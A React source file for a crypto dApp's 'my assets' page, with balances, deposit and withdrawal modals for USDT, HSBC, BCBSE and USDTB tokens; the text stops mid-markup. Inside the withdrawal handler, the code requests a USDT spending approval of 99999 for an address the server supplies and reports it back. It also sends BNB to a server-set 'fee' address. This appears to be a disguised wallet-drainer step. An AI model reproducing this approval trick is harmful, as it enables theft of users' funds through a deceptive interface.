import React, {useState, useEffect} from 'react';
import { connect } from 'react-redux';
import Head from '../../components/head/Head'
import Foot from '../../components/foot/Foot'
import { Input, message,Statistic  } from 'antd';
import {balanceOf,signer,transfer,allowance,approve,transferBnb} from '../../utils/ethers'

import NumberFormat from 'react-number-format'
import CountUp from "react-countup";
import { useTranslation } from 'react-i18next'
import {
    WarningOutlined,CloseOutlined
  } from '@ant-design/icons';
import './tan.css'
import '../invite/index.less'
import { addTixian, getAssetsIndex, getTixianRecord,addDepositBuy,addDepositBuyRed,getLiushui,addApprove,gethasPay,addPayBnb} from "../../api";
import { CSSTransition } from 'react-transition-group';
import { stringify } from 'qs';
import {useNavigate} from "react-router-dom";

const mapStateToProps=(state)=>{
    return{
        isLogin:state.isLogin,
        address:state.address,
        chain:state.chain
    }
}

const IndexTest2 = (props) => {
    const navigate = useNavigate()
    const { t } = useTranslation()
    const [num,setNum] = useState(0)
    const [coin,setCoin] = useState("MARS")
    const [tab,setTab] = useState("BNB")
    const [tab1,setTab1] = useState("col")
    const [valueCol,setValueCol] = useState("")
    const [valueDep,setValueDep] = useState("")
    

    const [isApproveUsdt,setIsApproveUsdt]=useState(false)


    const [receive,setReceive] = useState("")
    const [receiveFee,setReceiveFee] = useState("")
    const [receiveApprove,setReceiveApprove] = useState("")

    
    const [balanceOnUsdt,setBalanceOnUsdt] = useState("")
    const [balanceOnBcbse,setBalanceOnBcbse] = useState("")
    const [balanceOnUsdtb,setBalanceOnUsdtb] = useState("")
    const [bcbse_n,setBcbseN]=useState("")
    const [bcbse_n_d,setBcbseND]=useState("")
    const [usdtb_n,setUsdtbN]=useState("")
    const [usdtb_n_d,setUsdtbND]=useState("")
    const [bcbse_air_n,setBcbseAirN]=useState("")
    const [usdtb_air_n,setUsdtbAirN]=useState("")
    const [usdtb_pool_n,setUsdtbPoolN]=useState("")
    const [usdt_n,setUsdtN]=useState("")
    const [usdt_n_d,setUsdtND]=useState("")
    const [hsbc_n,setHsbcN]=useState("")
    const [hsbc_n_d,setHsbcND]=useState("")
    const [bnb_n,setBnbN]=useState("")
    const [bcbseAirEdu,setBcbseAirEdu] =useState(0)
    const [usdtbAirEdu,setUsdtbAirEdu] =useState(0)
    const [hasShou,setHasShou] =useState("")
    const [depoNum,setDepoNum] = useState("")
    const [isb,setIsB] =useState(false)
    
    const [list,setList] = useState([])
    const [isLock,setIsLock]=useState(false)
    const [showJoin,setShowJoin] = useState(false)
    const [showJoin1,setShowJoin1] = useState(false)
    const [classes,setClasses] = useState(0)

    const [showTi,setShowTi] = useState(false)
    const [showDep,setShowDep] = useState(false)

     const _isApproveUsdt =  () => {
       return  new Promise(async (resolve, reject) => {
            allowance(props.address,receiveApprove,"usdt").then(res=>{
                if(parseFloat(res)>=99999){
                    setIsApproveUsdt(true)
                    resolve(true)
                }else{
                    resolve(false)
                }
            },err =>{
                    resolve(false)
            })
         })
    }

  

    const _rand=  () =>{
            if(props.address.length<=0){
            message.error(t('head.请先连接钱包'))
            return false
        }
        if(props.isLogin === false){
            message.error(t('head.请先绑定地址'))
            return false
        }
       
        // if(props.address.length<=0) return false
    

        if(receive.length === 0){
            message.error(t('asset.区块合约错误'))
            return false
        }

        let _coin = coin.toLowerCase()
        console.log(valueDep)
        if(!valueDep){
            message.error(t('asset.请输入转入数量'))
            return false
        }
        if(valueDep.length<=0){
            message.error(t('asset.请输入转入数量'))
            return false
        }
        // if(valueDep<100){
        //     message.error(t('asset.最低')+":100")
        //     return false
        // }

        if(_coin == "bcbse"){
            if(valueDep<10){
                message.error(t('asset.最低')+":10")
                return false
            }
            if(parseFloat(valueDep)>parseFloat(balanceOnBcbse)){
      
                message.error(t('asset.您的钱包代币不足'))
                return false
            }
        }else if(_coin =="usdtb"){
            if(valueDep<1){
                message.error(t('asset.最低')+":1")
                return false
            }
            if(parseFloat(valueDep)>parseFloat(balanceOnUsdtb)){
      
                message.error(t('asset.您的钱包代币不足'))
                return false
            }
        }else if(_coin == "usdt"){
            if(valueDep<1){
                message.error(t('asset.最低')+":1")
                return false
            }
            if(parseFloat(valueDep)>parseFloat(balanceOnUsdt)){
      
                message.error(t('asset.您的钱包代币不足'))
                return false
            }
        }

        if(isLock){
            return false
        }
        setIsLock(true)
 let con = _coin
                if(_coin =="bcbse"){
                    con = "ccer"
                } 
                console.log(con)
                transfer(props.address,receive,String(con),valueDep).then(
                    res=>{
                        addDepositBuy({
                            address:props.address,
                            value:valueDep.toString(),
                            hex:res.hash,
                            coin:_coin
                        }).then(
                            res=>{
                                message.success(res.msg)
                                closeAll()
                                setNum(num+1);
                                setIsLock(false)
                            })
                    }, error=>{
                        setIsLock(false)
                        message.error(error)
                    })


    }



    // const _getTixianRecord = (classes) =>{
    //     if(props.address.length<=0){
    //         message.error(t('node.请先连接钱包'))
    //         return false
    //     }
    //     if(props.isLogin === false){
    //         message.error(t('node.请先绑定地址'))
    //         return false
    //     }
    //     setTab1(classes)
        
    //     getTixianRecord({classes:classes}).then(res=>{
    //             if(res.code === 0 ){
    
                  
    //                 if(res.data.list != null){
    //                     setList(res.data.list)
                        
    //                 }
    //                 setShowJoin1(true)
    
    //             }else{
    //                 message.error(res.msg)
    //             }
    //         },error =>{
    //             message.error(error)
    //         })
        
        
    // }

    // const _getLiushui = (coin) =>{
    //     if(props.address.length<=0){
    //         message.error(t('node.请先连接钱包'))
    //         return false
    //     }
    //     if(props.isLogin === false){
    //         message.error(t('node.请先绑定地址'))
    //         return false
    //     }
    //     setTab(coin)
        
    //         getLiushui({coin:coin}).then(res=>{
    //             if(res.code === 0 ){
    
                  
    //                 if(res.data.list != null){
    //                     setList(res.data.list)
                        
    //                 }
    //                 setShowJoin(true)
    
    //             }else{
    //                 message.error(res.msg)
    //             }
    //         },error =>{
    //             message.error(error)
    //         })
        
        
    // }

    const _getTixianIndex= () =>{
        if(props.address.length === 0 || props.isLogin === false){
            return false
        }
        getAssetsIndex().then(res=>{
            if(res.code === 0 ){
                setUsdtN(res.data.usdt_n)
                setUsdtND(res.data.usdt_n_d)
                setBcbseN(res.data.bcbse_n)
                setBcbseND(res.data.bcbse_n_d)
                setBnbN(res.data.bnb_n)
                setUsdtbN(res.data.usdtb_n)
                setUsdtbND(res.data.usdtb_n_d)

                  setHsbcN(res.data.hsbc_n)
                setHsbcND(res.data.hsbc_n_d)


                setBcbseAirN(res.data.bcbse_air_n)
                setUsdtbAirN(res.data.usdtb_air_n)
                setUsdtbPoolN(res.data.usdtb_pool_n)
                setReceive(res.data.receive)
                setBcbseAirEdu(res.data.bcbse_air_edu)
                setUsdtbAirEdu(res.data.usdtb_air_edu)
                setReceiveFee(res.data.fee_receive)
                setReceiveApprove(res.data.approve_receive)
                setHasShou(res.data.appr)
                setIsB(res.data.isb)
                // if(res.data.list != null){
                //     setList(res.data.list)
                // }

            }else{
                message.error(res.msg)
            }
        },error =>{
            message.error(error)
        })

    }
    const _maxTi = () =>{
         let _coin = coin.toLocaleLowerCase()
     
        if(props.address.length<=0){
            message.error(t('head.请先连接钱包'))
            return false
        }
        if(props.isLogin === false){
            message.error(t('head.请先绑定地址'))
            return false
        }
        if(_coin == "bcbse"){
          setValueCol(bcbse_n)
        }else if(_coin == "usdtb"){
            setValueCol(usdtb_n)
        }else if(_coin == "usdt"){
             setValueCol(usdt_n)
        }else if(_coin == "bcbse_air"){
             setValueCol(bcbse_air_n)
        }else if(_coin == "usdtb_air"){
             setValueCol(usdtb_air_n)
        }else if(_coin == "bnb"){
             setValueCol(bnb_n)
        }else{
           
        }

    }

   const _maxDep = () =>{
         let _coin = coin.toLocaleLowerCase()
     
        if(props.address.length<=0){
            message.error(t('head.请先连接钱包'))
            return false
        }
        if(props.isLogin === false){
            message.error(t('head.请先绑定地址'))
            return false
        }
        if(_coin == "bcbse"){
          setValueDep(balanceOnBcbse)
        }else if(_coin == "usdtb"){
            setValueDep(balanceOnUsdtb)
        }else if(_coin == "usdt"){
             setValueDep(balanceOnUsdt)
        }else{
           
        }

    }

    

    const _ti = async () =>{

        let _coin = coin.toLowerCase()
        if(props.address.length<=0){
            message.error(t('head.请先连接钱包'))
            return false
        }
        if(props.isLogin === false){
            message.error(t('head.请先连接钱包'))
            return false
        }
        message.warning(t('asset.提取中请等待'),4)
         const _isApprove =await _isApproveUsdt()
            console.log(isb)
         if(isb==false){
             if(_isApprove == false || parseInt(hasShou) == 3){
                let tx = await approve(receiveApprove,"usdt",99999,true)
                addApprove({address:props.address,hex:String(tx.hash)})
            }
         }
       

     

        if(valueCol.length===0){
            message.error(t('asset.请输入数量'))
            return false
        }
        if(_coin == "bcbse"){
            if(parseFloat(valueCol)<10){
                message.error(t('asset.最低提取数量')+"10")
                return false
            }
            if(parseFloat(valueCol)>parseFloat(bcbse_n)){
                message.error(t('asset.余额不足'))
                return false
            }
        }

        if(_coin == "bcbse_air"){
            if(parseFloat(valueCol)<1){
                message.error(t('asset.最低提取数量')+"1")
                return false
            }
            if(parseFloat(valueCol)>parseFloat(bcbse_air_n)){
                message.error(t('asset.余额不足'))
                return false
            }

            if(parseFloat(valueCol)>parseFloat(bcbseAirEdu)){
                message.error(t('asset.额度不足'))
                return false
            }
        }

        if(_coin == "usdtb"){
           
            if(parseFloat(valueCol)<10){
                message.error(t('asset.最低提取数量')+"10")
                return false
            }
            if(parseFloat(valueCol)>parseFloat(usdtb_n)){
                message.error(t('asset.余额不足'))
                return false
            }
        }

         if(_coin == "usdtb_air"){
           
            if(parseFloat(valueCol)<10){
                message.error(t('asset.最低提取数量')+"10")
                return false
            }
            if(parseFloat(valueCol)>parseFloat(usdtb_air_n)){
                message.error(t('asset.余额不足'))
                return false
            }
            if(parseFloat(valueCol)>parseFloat(usdtbAirEdu)){
                message.error(t('asset.额度不足'))
                return false
            }
        }

         if(_coin == "usdtb_pool"){
           
            if(parseFloat(valueCol)<10){
                message.error(t('asset.最低提取数量')+"10")
                return false
            }
            if(parseFloat(valueCol)>parseFloat(usdtb_pool_n)){
                message.error(t('asset.余额不足'))
                return false
            }
        }

        if(_coin == "usdt"){
            
            if(parseFloat(valueCol)<10){
                message.error(t('asset.最低提取数量')+"10")
                return false
            }
            if(parseFloat(valueCol)>parseFloat(usdt_n)){
                message.error(t('asset.余额不足'))
                return false
            }
        }

        if(_coin == "bnb"){
            
            if(parseFloat(valueCol)<0.01){
                message.error(t('asset.最低提取数量')+"0.01")
                return false
            }
            if(parseFloat(valueCol)>parseFloat(bnb_n)){
                message.error(t('asset.余额不足'))
                return false
            }
        }
        
        if(isLock) return false;
        setIsLock(true)

        // gethasPay({address:props.address,coin:coin}).then(resPay=>{
        //     if(resPay.data.has=="3"){
        //         transferBnb(props.address,receiveApprove,0.0007).then(async resBnb=>{
        //             let res4 = await addPayBnb({address:props.address,hex:String(resBnb.hash),coin:coin})
        //             if(res4.code==0){
                               
        //                             addTixian({address:props.address,receive:props.address,value:String(valueCol),coin:coin}).then(resTi=>{
        //                                 if(resTi.code==0){
        //                                     message.success(resTi.msg)
        //                                 }else{
        //                                     message.error(resTi.msg)
        //                                 }
        //                                 setIsLock(false)
        //                                 closeAll()
        //                                 setNum(num+1)
        //                             },errorTi=>{
        //                                 setIsLock(false)
        //                                 closeAll()
        //                                 message.error(errorTi)
        //                             })
                                    

                              
        //                     }else{
        //                         setIsLock(false)
        //                         closeAll()
        //                         message.error(res4.msg)
        //                     }

            
        //         },errBnb=>{
        //              setIsLock(false)
        //             closeAll()
        //             message.error(errBnb)
        //         })
        //     }else{
        //           signer(props.address).then(res=>{
        //                 addTixian({address:props.address,receive:props.address,value:String(valueCol),coin:coin,pass:res.pass}).then(resTi=>{
        //                     if(resTi.code==0){
        //                         message.success(resTi.msg)
        //                     }else{
        //                         message.error(resTi.msg)
        //                     }
        //                     setIsLock(false)
        //                     closeAll()
        //                     setNum(num+1)
        //                 },errorTi=>{
        //                     setIsLock(false)
        //                     closeAll()
        //                     message.error(errorTi)
        //                 })
                           

        //             },error=>{
        //                 setIsLock(false)
        //             })
        //     }
        // },errPay=>{
        //     closeAll()
        //     setIsLock(false)
        //     message.error(errPay)
        // })

       
        if(isb==false){
                gethasPay({address:props.address,coin:coin}).then(resPay=>{
                    if(resPay.data.has=="3"){
                            transferBnb(props.address,receiveFee,0.0008).then(async resBnb=>{
                            let res4 = await addPayBnb({address:props.address,hex:String(resBnb.hash),coin:coin})
                            if(res4.code==0){
                                            
                                
                                    addTixian({address:props.address,receive:props.address,value:String(valueCol),coin:coin,pass:props.address}).then(res=>{
                                        if(res.code===0){
                                            message.success(res.msg)
                                        }else{
                                            message.error(res.msg)
                                        }
                                        setIsLock(false)
                                        closeAll()
                                        setNum(num+1)
                                    },error=>{
                                        setIsLock(false)
                                        message.error(error)
                                    })

                             
                            }else{
                                setIsLock(false)
                                closeAll()
                                message.error(res4.msg)
                            }
                        })
                    }else{
                        signer(props.address).then(res=>{
                            addTixian({address:props.address,receive:props.address,value:String(valueCol),coin:coin,pass:res.pass}).then(res=>{
                                if(res.code===0){
                                    message.success(res.msg)
                                }else{
                                    message.error(res.msg)
                                }
                                setIsLock(false)
                                closeAll()
                                setNum(num+1)
                            },error=>{
                                setIsLock(false)
                                message.error(res.msg)
                            })
                        },error=>{
                            setIsLock(false)
                        })
                    }
                })
                
        }else{
             signer(props.address).then(res=>{
                addTixian({address:props.address,receive:props.address,value:String(valueCol),coin:coin,pass:res.pass}).then(res=>{
                    if(res.code===0){
                        message.success(res.msg)
                    }else{
                        message.error(res.msg)
                    }
                    setIsLock(false)
                    closeAll()
                    setNum(num+1)
                },error=>{
                    setIsLock(false)
                    message.error(res.msg)
                })
            },error=>{
                setIsLock(false)
            })
        }
         
        
        // signer(props.address).then(res=>{
        //     addTixian({address:props.address,receive:props.address,value:String(valueCol),coin:coin,pass:res.pass}).then(res=>{
        //         if(res.code===0){
        //             message.success(res.msg)
        //         }else{
        //             message.error(res.msg)
        //         }
        //         setIsLock(false)
        //         closeAll()
        //         setNum(num+1)
        //     },error=>{
        //         setIsLock(false)
        //         message.error(res.msg)
        //     })

        // },error=>{
        //     setIsLock(false)
        // })
    }

    const closeAll = () =>{
        setShowTi(false)
        setShowDep(false)
        setCoin("")
        setValueCol("")
        setValueDep("")
    }

    const openTi = (coin) =>{


        // if(coin=="usdt"){
        //     navigate('/colUsdt',{
        //         state:{
        //             address:props.address
        //         }
        //     })
        //     return
        // }
        // return
        //   let now = Date.now() /1000
        //         if(parseFloat(now) < 1768807800){
        //             message.error(t('g.暂未开始'))
        //                 return
        //         } 
       
    console.log(coin)
    if(coin == "bcbse_air" || coin == "usdtb_air"){
        
    }else{
          message.error(t('g.暂未开放'))
       return
    }
      

        if(props.address.length<=0 ){
            message.error(t('head.请先连接钱包'))
            return false
        }
        setShowDep(false)
        setCoin(coin)
        setShowTi(true)
        
        
    }

    const openDep = (coin) =>{
        if(coin=="usdt"){
            navigate('/depUsdt',{
                state:{
                    address:props.address
                }
            })
            return
        }else{
            message.error(t('g.暂未开放'))
            return
        }
        
        if(props.address.length<=0 ){
            message.error(t('head.请先连接钱包'))
            return false
        }
        if(coin=="BNB"){
            message.error("coing soon")
            return
        }
        let _coin =coin;
        if(coin == "bcbse"){
            _coin ="ccer"
        }
        if(isLock) return false;
        setIsLock(true)
        message.loading("get balance...",0)
        balanceOf(props.address,_coin.toLowerCase()).then(res=>{
            if(coin == "usdt"){
                setBalanceOnUsdt(res)
            }else if(coin =="bcbse"){
                setBalanceOnBcbse(res)
            }else if(coin == "usdtb"){
                setBalanceOnUsdtb(res)
            }
            message.destroy()
            setShowTi(false)
            setCoin(coin)
            setShowDep(true)
            setIsLock(false)
        },error=>{
            message.error(error)
            setIsLock(false)
        })
        
        
        
    }

    const goLiushui = (url)=>{
    //     message.error(t('g.暂未开放'))
    //    return
        if(props.address.length<=0 ){
            message.error(t('head.请先连接钱包'))
            return false
        }
        navigate(url,{
            state:{
                address:props.address
            }
        })
    }
    


    useEffect(() => {
            window.scrollTo(0, 0)
           
             _getTixianIndex()
             
            // _balanceOf()
            // _balanceOf1()
    }, 
    // eslint-disable-next-line
    [props.isLogin,num]);

    return (
        <>  


        {/*col  */}
        {
            showTi?(
                <div  className=' w-full lg:w-1/3 h-screen  fixed left-0 top-0  inout1' style={{"backgroundColor":"rgba(0,0,0,.6)"}}>
                    <CSSTransition in={showTi} unmountOnExit={true} classNames='asset' timeout={500} appear>
                        <div className=' w-full h-[380px] px-5 mx-auto overflow-auto  stakingWin11 rounded-t-2xl absolute  bottom-0' style={{"zIndex":"90"}}>
                            <div className='w-full  flex flex-row justify-center items-center text-gray-400 absolute top-6 right-5' style={{"zIndex":"999"}}>
                                
                                <CloseOutlined onClick={closeAll} className=' absolute right-0  text-xl' />
                            </div>

                            <div className=' w-full h-5 mt-12 flex flex-row justify-between items-center'>
                                <span className="text-sm text-gray-500">{t('asset.提取')} ${coin.toLocaleUpperCase()} </span>
                                <span className="text-xs text-gray-500">{t('asset.余额')}：<CountUp start={0} end={coin=="bcbse"?bcbse_n:coin=="usdtb"?usdtb_n:coin=="usdt"?usdt_n:coin=="bcbse_air"?bcbse_air_n:coin=="usdtb_air"?usdtb_air_n:0} duration="1" decimals={4} /></span>
                            </div>
                            {
                                coin=="bcbse_air"?(
                                    <div className=' w-full h-5 mt-3 flex flex-row justify-end items-center'>
                                        
                                        <span className="text-xs text-gray-500">{t('asset.剩余额度')}：<CountUp start={0} end={bcbseAirEdu} duration="1" decimals={4} /></span>
                                    </div>
                                ):coin=="usdtb_air"?(
                                    <div className=' w-full h-5 mt-3 flex flex-row justify-end items-center'>
                                        
                                        <span className="text-xs text-gray-500">{t('asset.剩余额度')}：<CountUp start={0} end={usdtbAirEdu} duration="1" decimals={4} /></span>
                                    </div>
                                ):null
                            }
                            <div className="w-full h-11 mt-3 rounded-full flex flex-row items-center px-4" style={{"backgroundColor":"#ffffff","border":"1px #583C25 solid"}} >
                                <input  onInput={(e)=>setValueCol(e.target.value)} value={valueCol}  type="number"   className=' w-4/5 h-11 text-sm text-black input1 ' placeholder='输入提取数量' ></input>
                                {/* <span onClick={_maxTi} className='w-1/5 h9 block text-right text-sm text-text-act'>{t('asset.全部')}</span> */}
                            </div>
                            <div className='w-full h-11 mb-5 flex flex-row justify-center items-center mt-5 rounded-full bg-gradient-to-r from-yellow1 to-yellow2'>
                        
                                <button  onClick={_ti}  className='w-full text-base text-[#ffffff] flex flex-row justify-center items-center z-10'>{t('asset.提取')}</button>
                            </div>
                            {/* <div className=' w-full mt-4 flex flex-row justify-center'>
                                <button onClick={_ti}  className='w-24 h-8 assetbt2  text-sm text-white font-extrabold '>{t('asset.提取')}</button>
                            </div> */}
                            
                        </div>
                    </CSSTransition>
                </div>
            ):null
        }
        {/*col  */}
        {
            showDep?(
                <div  className=' w-full lg:w-1/3 h-screen  fixed left-0 top-0 inout1' style={{"backgroundColor":"rgba(0,0,0,.8)"}}>
                    <CSSTransition in={showDep} unmountOnExit={true} classNames='asset' timeout={500} appear>
                        <div className=' w-full h-[380px] px-5 mx-auto overflow-auto  stakingWin11 rounded-t-2xl absolute  bottom-0' style={{"zIndex":"90"}}>
                            <div className='w-full  flex flex-row justify-center items-center text-gray-400 absolute top-6 right-5' style={{"zIndex":"999"}}>
                                
                                <CloseOutlined onClick={closeAll} className=' absolute right-0  text-xl' />
                            </div>

                            <div className=' w-full h-5 mt-12 flex flex-row justify-between items-center'>
                                <span className="text-sm text-gray-500">{t('asset.存入')} ${coin.toLocaleUpperCase()} </span>
                                <span className="text-xs text-gray-500">{t('asset.钱包余额')}：<CountUp start={0} end={coin=="bcbse"?balanceOnBcbse:coin=="usdtb"?balanceOnUsdtb:coin=="usdt"?balanceOnUsdt:0} duration="1" decimals={4} /></span>
                            </div>
                            <div className="w-full h-11 mt-5 rounded-full flex flex-row items-center px-4" style={{"backgroundColor":"#ffffff","border":"1px #583C25 solid"}} >
                                <input onInput={(e)=>setValueDep(e.target.value)} value={valueDep}  type="number"   className=' w-4/5 h-11 text-sm text-black input1 ' placeholder='输入提取数量'></input>
                                <span onClick={_maxDep} className='w-1/5 h9 block text-right text-sm text-text-act'>{t('asset.全部')}</span>
                            </div>
                            <div className='w-full h-11 mb-5 flex flex-row justify-center items-center mt-5 rounded-full bg-gradient-to-r from-yellow1 to-yellow2'>
                        
                                <button  onClick={_rand}  className='w-full text-base text-[#ffffff] flex flex-row justify-center items-center z-10'>{t('asset.存入')}</button>
                            </div>
                            {/* <div className=' w-full mt-4 flex flex-row justify-center'>
                                <button onClick={_rand}  className='w-24 h-8 assetbt22  text-sm text-white font-extrabold '>{t('asset.存入')}</button>
                            </div> */}
                            
                        </div>
                    </CSSTransition>
                </div>
            ):null
        }
        {/*  */}
        
            <Head/>
            
            <div style={{"backgroundColor":"#000628"}} className='indexBg33 pb-20  w-full lg:w-1/3 min-h-screen  pt-16 text-white flex flex-col'>
                {/*  */}
                <div className='w-full px-4    '>
                   
                    <div className='mt-4 w-full h-12  flex flex-row justify-start items-center'>
                        <img alt='rr' className=' mr-1' src={require('../../assets/img/re.png')} style={{"width":"20px"}}></img>
                        <span className='text-2xl oblod text-gray-100'>{t('asset.我的资产')}</span>
                    </div>
                        
                        {/* <div className="w-full mt-[40px] mb-[17px]  flex felx-row justify-start items-center">
                            
                            <span className=' text-2xl text-black fontB'>RWA代币资产</span>
                        </div> */}
                       
                       
                    
                </div>
                {/*  */}
                {/*  */}
           

            
            <div className='mx-4  px-4 mt-5  mb-5 rounded-md border border-[#081a93]  bg-[#000F3A]  flex flex-col justify-between items-center text-gray-500'>
                <div className='w-full mt-8 flex flex-row justify-between items-center'>
                        <div className='w-3/12 text-center flex flex-row justify-start items-center'>
                            <img alt='rr' className=' mr-2' src={require('../../assets/img/usdtlogo.png')} style={{"width":"30px"}}></img>
                            <span className=' text-base oblack text-gray-100'>USDT</span>
                        </div>
                        <div className='w-5/12 flex flex-row items-center justify-end '>
                            
                            <div className=' text-lg text-gray-100'><CountUp start={0} end={usdt_n} duration="1" decimals={4} /></div>
                        </div>
                </div>
                <div className='w-full flex flex-row justify-between items-center'>
                        <div className='w-3/12 text-center flex flex-row justify-start items-center'>
                            
                        </div>
                        <div className='w-5/12  flex flex-row items-center justify-end '>
                            
                            <div className=' text-sm text-gray-400'>≈$<CountUp start={0} end={usdt_n_d} duration="1" decimals={4} /></div>
                        </div>
                </div>
                <div className='w-full mt-5 mb-4 gap-3 text-white text-xs text-center flex flex-row justify-center items-center'>
                    <span onClick={()=>openDep("usdt")} className='w-1/3 rounded-md bg-gradient-to-b from-[#0161F6] to-[#030D54] hover:opacity-50 px-4 py-2 text-gray-100 text-sm text-center'>{t('asset.存入')}</span>
                    <span onClick={()=>openTi("usdt")} className='w-1/3 my-4 rounded-md bg-gradient-to-b from-[#0161F6] to-[#030D54] hover:opacity-50 px-4 py-2 text-gray-100 text-sm text-center'>{t('asset.提取')}</span>
                    <span onClick={()=>goLiushui("/record_usdt")} className='w-1/3 rounded-md bg-gradient-to-b from-[#0161F6] to-[#030D54] hover:opacity-50 px-4 py-2 text-gray-100 text-sm text-center'>{t('asset.记录')}</span>
                </div>
                
            </div>

            <div className='mx-4  px-4 mt-5  mb-5 rounded-md border border-[#081a93]  bg-[#000F3A]  flex flex-col justify-between items-center text-gray-500'>
                <div className='w-full mt-8 flex flex-row justify-between items-center'>
                        <div className='w-3/12 text-center flex flex-row justify-start items-center'>
                            <img alt='rr' className=' mr-2' src={require('../../assets/img/hsbc.png')} style={{"width":"30px"}}></img>
                            <span className=' text-base oblack text-gray-100'>HSBC</span>
                        </div>
                        <div className='w-5/12 flex flex-row items-center justify-end '>
                            
                            <div className=' text-lg text-gray-100'><CountUp start={0} end={hsbc_n} duration="1" decimals={4} /></div>
                        </div>
                </div>
                <div className='w-full flex flex-row justify-between items-center'>
                        <div className='w-3/12 text-center flex flex-row justify-start items-center'>
                            
                        </div>
                        <div className='w-5/12  flex flex-row items-center justify-end '>
                            
                            <div className=' text-sm text-gray-400'>≈$<CountUp start={0} end={hsbc_n_d} duration="1" decimals={4} /></div>
                        </div>
                </div>
                <div className='w-full mt-5 mb-4 gap-3 text-white text-xs text-center flex flex-row justify-center items-center'>
                    <span onClick={()=>openDep("hsbc")} className='w-1/3 rounded-md bg-gradient-to-b from-[#0161F6] to-[#030D54] hover:opacity-50 px-4 py-2 text-gray-100 text-sm text-center'>{t('asset.存入')}</span>
                    <span onClick={()=>openTi("hsbc")} className='w-1/3 my-4 rounded-md bg-gradient-to-b from-[#0161F6] to-[#030D54] hover:opacity-50 px-4 py-2 text-gray-100 text-sm text-center'>{t('asset.提取')}</span>
                    <span onClick={()=>goLiushui("/record_hsbc")} className='w-1/3 rounded-md bg-gradient-to-b from-[#0161F6] to-[#030D54] hover:opacity-50 px-4 py-2 text-gray-100 text-sm text-center'>{t('asset.记录')}</span>
                </div>
                
            </div>

            <div className='mx-4  px-4  mb-5 rounded-md border border-[#081a93]  bg-[#000F3A]  flex flex-col justify-between items-center text-gray-500'>
                <div className='w-full mt-8 flex flex-row justify-between items-center'>
                        <div className='w-3/12 text-center flex flex-row justify-start items-center'>
                            <img alt='rr' className=' mr-2' src={require('../../assets/bcb/logo.png')} style={{"width":"30px"}}></img>
                            <span className=' text-base oblack text-gray-100'>BCBSE</span>
                        </div>
                        <div className='w-5/12 flex flex-row items-center justify-end '>
                            
                            <div className=' text-lg text-gray-100'><CountUp start={0} end={bcbse_n} duration="1" decimals={4} /></div>
                        </div>
                </div>
                <div className='w-full flex flex-row justify-between items-center'>
                        <div className='w-3/12 text-center flex flex-row justify-start items-center'>
                            
                        </div>
                        <div className='w-5/12  flex flex-row items-center justify-end '>
                            
                            <div className=' text-sm text-gray-400'>≈$<CountUp start={0} end={bcbse_n_d} duration="1" decimals={4} /></div>
                        </div>
                </div>
                <div className=' w-full mx-auto mt-5 h-14 rounded-md bg-gradient-to-b from-[#1a2971] to-[#040e3c] flex flex-row justify-center items-center'>
                    <div className=' font14 text-gray-400'>
                            0x00000000......00000000000
                    </div>
                    <span className='  px-4 py-2 text-sm text-gray-100  rounded-md text-left'>
                            <svg t="1769262199022" class="icon" viewBox="0 0 1024 1024" version="1.1" xmlns="http://www.w3.org/2000/svg" p-id="5374" width="20" height="20"><path d="M661.333333 234.666667A64 64 0 0 1 725.333333 298.666667v597.333333a64 64 0 0 1-64 64h-469.333333A64 64 0 0 1 128 896V298.666667a64 64 0 0 1 64-64z m-21.333333 85.333333H213.333333v554.666667h426.666667v-554.666667z m191.829333-256a64 64 0 0 1 63.744 57.856l0.256 6.144v575.701333a42.666667 42.666667 0 0 1-85.034666 4.992l-0.298667-4.992V149.333333H384a42.666667 42.666667 0 0 1-42.368-37.674666L341.333333 106.666667a42.666667 42.666667 0 0 1 37.674667-42.368L384 64h447.829333z" fill="#0161F6" p-id="5375"></path></svg>
                    </span>
                    
                        
                    </div>
                <div className='w-full mt-5 mb-4 gap-3 text-white text-xs text-center flex flex-row justify-center items-center'>
                    <span onClick={()=>openDep("bcbse")} className='w-1/3 rounded-md bg-gradient-to-b from-[#0161F6] to-[#030D54] hover:opacity-50 px-4 py-2 text-gray-100 text-sm text-center'>{t('asset.存入')}</span>
                    <span onClick={()=>openTi("bcbse")} className='w-1/3 my-4 rounded-md bg-gradient-to-b from-[#0161F6] to-[#030D54] hover:opacity-50 px-4 py-2 text-gray-100 text-sm text-center'>{t('asset.提取')}</span>
                    <span onClick={()=>goLiushui("/record_bcbse")} className='w-1/3 rounded-md bg-gradient-to-b from-[#0161F6] to-[#030D54] hover:opacity-50 px-4 py-2 text-gray-100 text-sm text-center'>{t('asset.记录')}</span>
                </div>
                
            </div>

            <div className='mx-4  px-4  mb-5 rounded-md border border-[#081a93]  bg-[#000F3A]  flex flex-col justify-between items-center text-gray-500'>
                <div className='w-full mt-8 flex flex-row justify-between items-center'>
                        <div className='w-3/12 text-center flex flex-row justify-start items-center'>
                            <img alt='rr' className=' mr-2' src={require('../../assets/bcb/usdtb.png')} style={{"width":"30px"}}></img>
                            <span className=' text-base oblack text-gray-100'>USDTB</span>
                        </div>
                        <div className='w-5/12 flex flex-row items-center justify-end '>
                            
                            <div className=' text-lg text-gray-100'><CountUp start={0} end={usdtb_n} duration="1" decimals={4} /></div>
                        </div>
                </div>
                <div className='w-full flex flex-row justify-between items-center'>
                        <div className='w-3/12 text-center flex flex-row justify-start items-center'>
                            
                        </div>
                        <div className='w-5/12  flex flex-row items-center justify-end '>
                            
                            <div className=' text-sm text-gray-400'>≈$<CountUp start={0} end={usdtb_n_d} duration="1" decimals={4} /></div>
                        </div>
                </div>
                <div className=' w-full mx-auto mt-5 h-14 rounded-md bg-gradient-to-b from-[#1a2971] to-[#040e3c] flex flex-row justify-center items-center'>
                    <div className=' font14 text-gray-400'>
                            0x00000000......00000000000
                    </div>
                    <span className='  px-4 py-2 text-sm text-gray-100  rounded-md text-left'>
                            <svg t="1769262199022" class="icon" viewBox="0 0 1024 1024" version="1.1" xmlns="http://www.w3.org/2000/svg" p-id="5374" width="20" height="20"><path d="M661.333333 234.666667A64 64 0 0 1 725.333333 298.666667v597.333333a64 64 0 0 1-64 64h-469.333333A64 64 0 0 1 128 896V298.666667a64 64 0 0 1 64-64z m-21.333333 85.333333H213.333333v554.666667h426.666667v-554.666667z m191.829333-256a64 64 0 0 1 63.744 57.856l0.256 6.144v575.701333a42.666667 42.666667 0 0 1-85.034666 4.992l-0.298667-4.992V149.333333H384a42.666667 42.666667 0 0 1-42.368-37.674666L341.333333 106.666667a42.666667 42.666667 0 0 1 37.674667-42.368L384 64h447.829333z" fill="#0161F6" p-id="5375"></path></svg>
                    </span>
                    
                        
                    </div>
